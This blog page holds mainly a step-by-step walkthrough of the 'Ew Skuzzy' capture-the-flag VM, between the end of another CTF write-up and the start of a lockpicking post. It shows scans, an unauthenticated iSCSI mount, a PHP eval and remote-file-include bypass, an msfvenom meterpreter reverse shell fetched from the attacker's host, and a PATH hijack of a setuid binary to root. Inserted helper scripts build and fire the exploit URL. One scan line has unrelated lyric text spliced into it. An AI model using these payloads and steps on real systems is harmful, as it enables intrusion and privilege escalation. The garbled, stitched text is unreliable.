root@pluck:/home/paul# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
root@pluck:/home/paul# cd /root
root@pluck:/root# ls
flag.txt
root@pluck:/root# cat flag.txt 

Congratulations you found the flag

---------------------------------------

######   ((((((((((((((((((((((((((((((
#########   (((((((((((((((((((((((((((
,,##########   ((((((((((((((((((((((((
@@,,,##########   (((((((((((((((((((((
@@@@@,,,##########                     
@@@@@@@@,,,############################
@@@@@@@@@@@,,,#########################
@@@@@@@@@,,,###########################
@@@@@@,,,##########                    
@@@,,,##########   &&&&&&&&&&&&&&&&&&&&
,,,##########   &&&&&&&&&&&&&&&&&&&&&&&
##########   &&&&&&&&&&&&&&&&&&&&&&&&&&
#######   &&&&&&&&&&&&&&&&&&&&&&&&&&&&&

root@pluck:/root# 


That’s all folks!

Ew Skuzzy CTF Walkthrough

Note: You’ll notice the target IP switches from 192.168.1.37 to 192.168.1.35. This is because it took me 2 days to solve the CTF and I shut down the VM in between.

This time I tried a fairly new CTF VM, Ew Skuzzy.

I started by running nmap to see what was open:

# nmap -sV 192.168.1.37 -p 1-65535

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-03-20 21:38 ART
Nmap scan report for 192.168.1.37
Host is up (0.0019s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    nginx
3260/tcp open  iscsi?
MAC Address: 2C:F0:EE:30:40:BE (Apple)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 446.20 seconds

I took a look at the http server to know what was going on in there:

[Screenshot: http]

Then I ran dirb to find some folders:

# dirb http://192.168.1.37

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Mar 20 22:11:26 2017
URL_BASE: http://192.168.1.37/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.37/ ----
+ http://192.168.1.37/index.html (CODE:200|SIZE:1297)
==> DIRECTORY: http://192.168.1.37/smblogin/

---- Entering directory: http://192.168.1.37/smblogin/ ----
==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/

---- Entering directory: http://192.168.1.37/smblogin/custom-log/ ----
==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/

---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/ ----
==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/

---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/ ----
==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/

---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/ ----
==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/

---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/ ----
==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/

---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/ ----
==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/

---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/ ----
==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/

---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/ ----
==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/

---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/ ----
==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/

---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/ ----
==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/

---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/ ----
==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/

---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/ ----
==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/

---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/ ----
==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/

---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/ ----
==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/

---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/ ----
==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/

---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/ ----
==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/

---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/
+ http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/xmlrpc.php (CODE:200|SIZE:450)
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/affiliates/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/affiliates/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/affiliates/dba/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/affiliates/dba/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-loI can see it in your eyes lyricsg/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/affiliates/dba/program/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/affiliates/dba/program/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/affiliates/dba/program/font/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/affiliates/dba/program/font/ ----
                                                                           + http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/affiliates/dba/program/font/index.html (CODE:200|SIZE:527)
                                                                               
-----------------
END_TIME: Mon Mar 20 22:17:49 2017
DOWNLOADED: 119912 - FOUND: 3

As you can see, it found 3 items in total (the deep directory chain was a troll in itself). Browsing those directories I found some more trolling, like:

Troll1

And

Troll2

But this last one wasn't such a troll after all. Looking at the source code:

Troll2

And by base64-decoding it I got some directions:

Troll2

This was clearly telling me to take a look at the other open port, the iSCSI one (3260/tcp).

I had never used this protocol before and it took me a while to figure out how to connect to it. I must admit the service had no authentication; otherwise I'd still be trying to get in.

Basically I had to install open-iscsi in order to connect. I started the initiator daemon, dumped the discovery record for the portal and then ran an actual sendtargets discovery:

root@pss:~/ctf/ew# service iscsid start
root@pss:~/ctf/ew# iscsiadm -m discoverydb -t st -p 192.168.1.37 
# BEGIN RECORD 2.0-874
discovery.startup = manual
discovery.type = sendtargets
discovery.sendtargets.address = 192.168.1.37
discovery.sendtargets.port = 3260
discovery.sendtargets.auth.authmethod = None
discovery.sendtargets.auth.username = <empty>
discovery.sendtargets.auth.password = <empty>
discovery.sendtargets.auth.username_in = <empty>
discovery.sendtargets.auth.password_in = <empty>
discovery.sendtargets.timeo.login_timeout = 15
discovery.sendtargets.use_discoveryd = No
discovery.sendtargets.discoveryd_poll_inval = 30
discovery.sendtargets.reopen_max = 5
discovery.sendtargets.timeo.auth_timeout = 45
discovery.sendtargets.timeo.active_timeout = 30
discovery.sendtargets.iscsi.MaxRecvDataSegmentLength = 32768
# END RECORD
root@pss:~/ctf/ew# iscsiadm -m discovery -t st -p 192.168.1.37 
192.168.1.37:3260,1 iqn.2017-02.local.skuzzy:storage.sys0

The discovery record shows discovery.sendtargets.auth.authmethod = None, and the sendtargets query returned a single target, iqn.2017-02.local.skuzzy:storage.sys0. At this point I just needed to log in to that target and mount the LUN it exports. After the login the disk shows up as a new block device; it was /dev/sdb on my box, but check dmesg or lsblk rather than assuming the name:

root@pss:~/ctf/ew# iscsiadm -m node --targetname iqn.2017-02.local.skuzzy:storage.sys0 -p 192.168.1.37 --login
Logging in to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.1.37,3260] (multiple)
Login to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.1.37,3260] successful.
root@pss:~# mount /dev/sdb /mnt
root@pss:~# cd /mnt/
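The same discovery, login and mount as an added example that is not part of the original post: a small POSIX shell script that parses the sendtargets output, logs in to every target it lists, waits for the LUN's stable udev path under /dev/disk/by-path instead of assuming /dev/sdb, and mounts it read-only. It assumes open-iscsi is installed, that the target needs no CHAP (as was the case here) and that it runs as root; PORTAL and MOUNTPOINT are illustrative values.

```shell
#!/bin/sh
# Added example (not from the original post): drive open-iscsi the way the
# walkthrough does, but locate the LUN by its stable udev path instead of
# guessing /dev/sdb, and mount it read-only.
# Assumptions: open-iscsi installed, no CHAP on the target, run as root.
# PORTAL and MOUNTPOINT are illustrative defaults.

PORTAL="${PORTAL:-192.168.1.37}"
MOUNTPOINT="${MOUNTPOINT:-/mnt/iscsi}"

# Parse `iscsiadm -m discovery -t st -p <portal>` output, which looks like
#   192.168.1.37:3260,1 iqn.2017-02.local.skuzzy:storage.sys0
# and print "<ip:port> <iqn>" per target (the ",1" is the target portal group tag).
parse_sendtargets() {
    awk 'NF == 2 && $2 ~ /^iqn\./ { sub(/,[0-9]+$/, "", $1); print $1, $2 }'
}

# The symlink udev creates for an iSCSI LUN; unlike /dev/sdX it does not
# depend on the order in which disks were probed.
iscsi_device_path() {   # $1 = ip:port, $2 = iqn, $3 = lun number
    printf '/dev/disk/by-path/ip-%s-iscsi-%s-lun-%s\n' "$1" "$2" "$3"
}

# Wait up to $2 seconds for block device $1 to appear. Returns 1 on timeout.
wait_for_device() {
    i=0
    while [ "$i" -lt "$2" ]; do
        if [ -b "$1" ]; then return 0; fi
        i=$((i + 1))
        sleep 1
    done
    return 1
}

# Discover, log in, wait for LUN 0 of each target and mount it read-only.
mount_all_targets() {
    iscsiadm -m discovery -t st -p "$PORTAL" | parse_sendtargets |
    while read -r portal iqn; do
        iscsiadm -m node -T "$iqn" -p "$portal" --login
        dev=$(iscsi_device_path "$portal" "$iqn" 0)
        if ! wait_for_device "$dev" 15; then
            echo "no block device appeared for $iqn" >&2
            continue
        fi
        mkdir -p "$MOUNTPOINT"
        # ro,noexec: look at the evidence without modifying or executing it.
        mount -o ro,noexec "$dev" "$MOUNTPOINT"
        echo "$iqn mounted read-only at $MOUNTPOINT (from $dev)"
    done
}

# Unmount and close the session so it does not linger on the initiator.
logout_all() {
    umount "$MOUNTPOINT" 2>/dev/null
    iscsiadm -m node -p "$PORTAL" --logout
}

if [ "${ISCSI_RUN:-0}" = 1 ]; then
    mount_all_targets
fi
```

Run it as root with ISCSI_RUN=1 to do the real thing; parse_sendtargets and iscsi_device_path are pure string functions you can try without a target, and logout_all cleans up afterwards.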

Listing the files, I got what I was looking for!

root@pss:/mnt# ls
bobsdisk.dsk  flag1.txt  lost+found
root@pss:/mnt# cat flag1.txt 
Congratulations! You've discovered the first flag!

flag1{c0abc15976b98a478150c900ebb0c86f0327f4dd}

Let's see how you go with the next one...

Then I needed to know what that bobsdisk.dsk file was, so I ran file on it:

root@pss:/mnt# file bobsdisk.dsk 
bobsdisk.dsk: Linux rev 1.0 ext2 filesystem data, UUID=faef0c66-b61b-4d80-8c20-5e8da65345d4 (large files)

It's an ext2 disk image! Let's see if I can mount it (mount sets up a loop device by itself when given a regular file; for anything you want to preserve, add -o ro,noexec so nothing on the image gets modified or executed):

root@pss:/mnt# mkdir ~/ctf/ew/dsk
root@pss:/mnt# mount bobsdisk.dsk ~/ctf/ew/dsk/
root@pss:/mnt# cd ~/ctf/ew/dsk/
root@pss:~/ctf/ew/dsk# ls
lost+found  ToAlice.csv.enc  ToAlice.eml
root@pss:~/ctf/ew/dsk# less ToAlice.eml 
root@pss:~/ctf/ew/dsk# cat ToAlice.eml | grep flag
PPS: flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}

I had my second flag!

The next step was to find out what the encrypted file contained. Looking closely at the ToAlice.eml file, we find everything we need to decrypt it: the cipher (AES-256-CBC), the digest used to derive the key from the password (SHA-256), and the password itself. The -md sha256 is not optional: OpenSSL 1.0.x derived enc keys with MD5 by default and 1.1.0 switched the default to SHA-256, so a client using the wrong digest gets a bad decrypt error even with the right password:

root@pss:~/ctf/ew/dsk# openssl aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ./decrypted.txt
enter aes-256-cbc decryption password:
root@pss:~/ctf/ew/dsk# ls
decrypted.txt  lost+found  ToAlice.csv.enc  ToAlice.eml
root@pss:~/ctf/ew/dsk# cat decrypted.txt 
Web Path,Reason
5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site! 
c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?
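To make that -md point concrete, here is an added example (mine, not from the post): it encrypts a constructed line the way the challenge file was produced, with a SHA-256 key derivation, then decrypts it once with SHA-256 and once with MD5. The password and the plaintext are made up.

```shell
#!/bin/sh
# Added example (not from the original post): show that `openssl enc`
# password mode only works when the key-derivation digest matches.
# Assumptions: an openssl binary on PATH; password and sample text are made up.

PASSWORD="${PASSWORD:-correct horse battery}"   # hypothetical password

# Encrypt stdin into file $1 with AES-256-CBC, deriving key and IV from
# the password and a random salt using digest $2 (EVP_BytesToKey).
enc_with_md() {   # $1 = output file, $2 = digest name
    openssl enc -aes-256-cbc -salt -md "$2" -pass "pass:$PASSWORD" -out "$1"
}

# Decrypt file $1 using digest $2 for the key derivation.
# Prints the plaintext; exit status is openssl's (non-zero on bad decrypt).
dec_with_md() {   # $1 = input file, $2 = digest name
    openssl enc -d -aes-256-cbc -md "$2" -pass "pass:$PASSWORD" -in "$1" 2>/dev/null
}

# Encrypt a constructed CSV header with SHA-256 (what the challenge file used),
# then decrypt with the digest given in $1. Prints the recovered text,
# or FAIL when openssl reports a bad decrypt. With the wrong digest the
# derived key is wrong, so you get either FAIL or garbage, never the plaintext.
roundtrip() {   # $1 = digest used for decryption
    tmp=$(mktemp)
    printf 'Web Path,Reason\n' | enc_with_md "$tmp" sha256
    if out=$(dec_with_md "$tmp" "$1"); then
        printf '%s\n' "$out"
    else
        echo FAIL
    fi
    rm -f "$tmp"
}
```

For anything you encrypt yourself, pass -pbkdf2 (OpenSSL 1.1.1 and later) so the key is derived with a proper iterated KDF and the digest question does not arise; the CTF file predates that option.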

So I had the third flag, and two web directories to look at:

The first one was just crap. :P

First Directory

The second one was different, some kind of CMS.

Second Directory

One of the URLs was loading content, more precisely this one: http://192.168.1.35/c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt

I had a really bad time figuring out how to get past that reader.

I noticed that if I entered a URL on a host other than 127.0.0.1 it asked for a key. And not only that: if you add a key parameter with one of the previous flags, the message changes to say that the key is invalid.

After some time I noticed the p param was loading plain files; for instance ?p=flag loads flag.php. So I tried to access the data.txt file directly.

Data txt file

The interesting part here is that the opening and closing tags were ##php## instead of the conventional ones, so the reader is evaluating whatever sits between those markers. Finally I found a way to bypass that eval by having the file converted to base64 first; that way the reader only displays the encoded file content instead of executing it. Since I already knew about the ?p param I went for the flag.php file directly.

base64 encoded flag.php file

When decoding it I found the fourth flag!

base64 decoded flag.php file

flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}

So the next step is to get a shell! This step was somehow the easiest in the whole CTF. I already knew a key parameter was needed to load external files. I also knew it had the flag format because of the change in the error message. I tried flag4 as the key and it was the right one!

So I created a php reverse shell with msfvenom

root@pss:~/ctf/ew# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.38 LPORT=6000 R > www/shell1.txt
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 948 bytes

I had forgotten that the data.txt file used unusual opening/closing tags, ##php## instead of the standard ones. I edited the payload file, replacing the <?php ... ?> tags with ##php## markers, and tried again.

Then I served it with Python's built-in HTTP server:

root@pss:~/ctf/ew/www# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Then from msfconsole I prepared myself to get the shell! :P

root@pss:~/ctf/ew/www# msfconsole 
                                                  

                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/


Love leveraging credentials? Check out bruteforcing
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.13.21-dev                         ]
+ -- --=[ 1621 exploits - 924 auxiliary - 282 post        ]
+ -- --=[ 472 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/handler 
msf exploit(handler) > set LHOST 192.168.1.38
LHOST => 192.168.1.38
msf exploit(handler) > set LPORT 6000
LPORT => 6000
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set payload php/meterInterrupt: use the 'exit' command to quit
msf exploit(handler) > Interrupt: use the 'exit' command to quit
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.38     yes       The listen address
   LPORT  6000             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.1.38:6000 
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 192.168.1.35
[*] Meterpreter session 1 opened (192.168.1.38:6000 -> 192.168.1.35:44034) at 2017-03-21 10:40:34 -0300

meterpreter > sysinfo
Computer    : skuzzy
OS          : Linux skuzzy 4.4.0-64-generic #85-Ubuntu SMP Mon Feb 20 11:50:30 UTC 2017 x86_64
Meterpreter : php/linux
meterpreter > 

I got the session as soon as I hit the CTF VM with the following URL:

http://192.168.1.35/c2444910794e037ebd8aaf257178c90b/?p=reader&key=flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}&url=http://192.168.1.38/shell1.txt
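The two preparation steps, rewriting the msfvenom output to the reader's ##php## markers and building the trigger URL, as an added example that is not from the original post. The target address, directory hash, key and file names are the walkthrough's; the functions and the percent-encoding are mine. The braces in the flag key are not URL-safe, so they get encoded (curl, for one, treats unescaped braces as its own glob syntax unless you pass -g).

```shell
#!/bin/sh
# Added example (not from the original post): prepare a PHP payload for a
# reader that evaluates code between ##php## markers, and build the request
# that makes the reader fetch it. Values are the walkthrough's; code is mine.

# Rewrite standard PHP tags to the reader's ##php## markers. "<?php" must be
# handled before the short "<?" opener, otherwise "php" would be left behind.
# Pure-PHP payloads such as the msfvenom output have nothing outside the tags.
convert_tags() {
    sed -e 's/<?php/##php##/g' -e 's/<?/##php##/g' -e 's/?>/##php##/g'
}

# Percent-encode one argument for use in a query parameter: RFC 3986
# unreserved characters pass through, everything else (including { } : / ?)
# becomes %XX. ASCII input only.
urlencode() {
    s="$1"
    out=""
    while [ -n "$s" ]; do
        c=${s%"${s#?}"}     # first character of the remaining string
        s=${s#?}
        case $c in
            [A-Za-z0-9.~_-]) out="$out$c" ;;
            *) out="$out$(printf '%%%02X' "'$c")" ;;
        esac
    done
    printf '%s\n' "$out"
}

# The reader URL: p=reader, the key it demands for non-local URLs, and the
# URL it should fetch (our payload on the attacker's web server).
reader_url() {   # $1 = target base URL, $2 = key, $3 = URL to fetch
    printf '%s/?p=reader&key=%s&url=%s\n' "$1" "$(urlencode "$2")" "$(urlencode "$3")"
}

# Fire the request; the multi/handler listener and the HTTP server hosting
# the payload must already be up, as in the walkthrough. Prints the HTTP status.
trigger() {   # $1 = target base URL, $2 = key, $3 = payload URL
    curl -s -o /dev/null -w '%{http_code}\n' "$(reader_url "$1" "$2" "$3")"
}

# Usage (commented out so the file can be sourced without side effects):
# convert_tags < shell1.txt > www/shell1.txt
# trigger http://192.168.1.35/c2444910794e037ebd8aaf257178c90b \
#         'flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}' http://192.168.1.38/shell1.txt
```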

After getting trolled and trolled, and kicked and trolled, I got to /opt, where a setuid root binary was waiting (note the 104755 mode):

Listing: /opt
=============

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
104755/rwxr-xr-x  8736  fil   2017-03-02 09:28:40 -0300  alicebackup

meterpreter > shell
Process 1967 created.
Channel 4 created.
./alicebackup
uid=0(root) gid=0(root) groups=0(root),33(www-data)
ssh: Could not resolve hostname alice.home: Name or service not known
lost connection

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

ssh alice.home
Pseudo-terminal will not be allocated because stdin is not a terminal.
ssh: Could not resolve hostname alice.home: Name or service not known

Reading the ./alicebackup output, we can see it runs two commands, id and ssh, and it must be resolving them through PATH rather than by absolute path. I also ran them myself so you can check that the outputs are the same.

What we need to get root is to hijack PATH so that a directory we control is searched first, and put our own id (or ssh) there that launches a shell. Since alicebackup prints uid=0, meaning it runs id as root, I tried replacing id first. That it reports uid=0 rather than euid=0 also tells you the binary sets its real uid to root before calling id, so any shell copied over id keeps root; if only the effective uid were root, a copied bash would drop it unless started with -p, whereas dash (Ubuntu's /bin/sh) does not.

When running alicebackup again, instead of running the real id as root it runs our copy of sh as root, giving me a root shell.

The following is just the command sequence to get root and the last flag:

cd /tmp
cp /bin/sh id
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export PATH=/tmp:$PATH
echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
cd /opt
./alicebackup


whoami
root
cd /root
ls -la
total 24
drwx------  3 root root 4096 Mar  2 22:36 .
drwxr-xr-x 23 root root 4096 Feb 28 06:51 ..
-rw-r--r--  1 root root 3106 Oct 23  2015 .bashrc
-rw-r--r--  1 root root  148 Aug 18  2015 .profile
drwx------  2 root root 4096 Mar  2 22:36 .ssh
-rw-r--r--  1 root root  493 Mar  2 22:04 flag.txt
cat flag.txt
Congratulations!

flag5{42273509a79da5bf49f9d40a10c512dd96d89f6a}

You've found the final flag and pwned this CTF VM!

I really hope this was an enjoyable challenge, and that my trolling and messing with you didn't upset you too much! I had a blast making this VM, so it won't be my last!

I'd love to hear your thoughts on this one.
Too easy?
Too hard?
Too much stuff to install to get the iSCSI initiator working?

Drop me a line on twitter @vortexau, or via email vortex@juicedigital.net
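The hijack itself, as an added example that is not from the original post and that you can run as an unprivileged user: a shell function stands in for a program that calls system("id") with a relative command name, a fake id is planted in a directory we control and prepended to PATH, and the same run is repeated against the two usual fixes (absolute path, and a trusted PATH reset). There is no setuid binary here, and the fake id prints a marker instead of spawning a shell so the result is deterministic.

```shell
#!/bin/sh
# Added example (not from the original post): reproduce the PATH hijack used
# against alicebackup in a sandbox, and show the two fixes. No setuid binary
# is involved; vulnerable_backup() stands in for a program that calls
# system("id") with a relative name, which resolves "id" through the
# caller's PATH exactly as the real binary did.

vulnerable_backup() {
    sh -c 'id'
}

# Fix 1: call the binary by absolute path, so PATH is irrelevant.
fixed_backup_abspath() {
    sh -c '/usr/bin/id'
}

# Fix 2: reset PATH to a trusted value before running anything, which is
# what a privileged program should do (sudo's secure_path does the same).
fixed_backup_securepath() {
    env PATH=/usr/sbin:/usr/bin:/sbin:/bin sh -c 'id'
}

# Plant a fake "id" in a temporary directory, put that directory first in
# PATH (as `export PATH=/tmp:$PATH` did in the CTF) and run the given
# function in a subshell so the hijacked PATH does not leak out.
# The fake id only prints a marker; the CTF used a copy of /bin/sh instead.
run_with_hijacked_path() {   # $1 = name of the function to run
    dir=$(mktemp -d)
    printf '#!/bin/sh\necho HIJACKED\n' > "$dir/id"
    chmod 755 "$dir/id"
    ( PATH="$dir:$PATH"; "$1" )
    rm -rf "$dir"
}

# Demo: the vulnerable stand-in runs our fake id; the fixed ones run the real one.
demo() {
    echo "vulnerable : $(run_with_hijacked_path vulnerable_backup)"
    echo "abs path   : $(run_with_hijacked_path fixed_backup_abspath)"
    echo "secure PATH: $(run_with_hijacked_path fixed_backup_securepath)"
}
```

Call demo to see the three results side by side. On a real setuid target the same check is worth doing the other way round too: run the binary under strace -f or ltrace and look for execve of bare command names, which is exactly the signal the author read off alicebackup's output.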

I found this VM really fun and challenging. The two steps that were really hard to solve were the iSCSI service and the base64 trick on the PHP portal. I also learned a lot from this, mainly because of the trolling and the many false positives and false clues, like the Seinfeld scripts:

The soup nazi

My top 3 youtube lockpicking channels

This will be a really short and simple post, just to let you guys know which are my favorite YouTube channels on lockpicking.

